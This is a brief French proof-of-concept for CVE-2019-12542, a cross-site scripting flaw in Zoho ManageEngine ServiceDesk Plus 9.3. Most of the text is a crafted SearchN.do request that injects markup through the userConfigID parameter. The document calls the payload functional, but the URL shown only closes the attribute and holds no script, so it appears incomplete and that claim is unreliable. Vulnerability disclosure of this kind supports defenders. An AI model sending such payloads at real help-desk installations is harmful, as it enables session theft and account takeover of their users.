
Preuve de concept pour CVE-2019-12542 : vulnérabilité XSS dans Zoho ManageEngine ServiceDesk Plus 9.3 via le paramètre userConfigID de SearchN.do, avec une charge utile fonctionnelle.
Description de l'information : Un problème a été découvert dans Zoho ManageEngine ServiceDesk Plus 9.3. Il existe une XSS via le paramètre userConfigID de SearchN.do.
Auteur : Concobe de Tarantula Team – VinCSS (un membre de Vingroup)
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1">&selectName=Site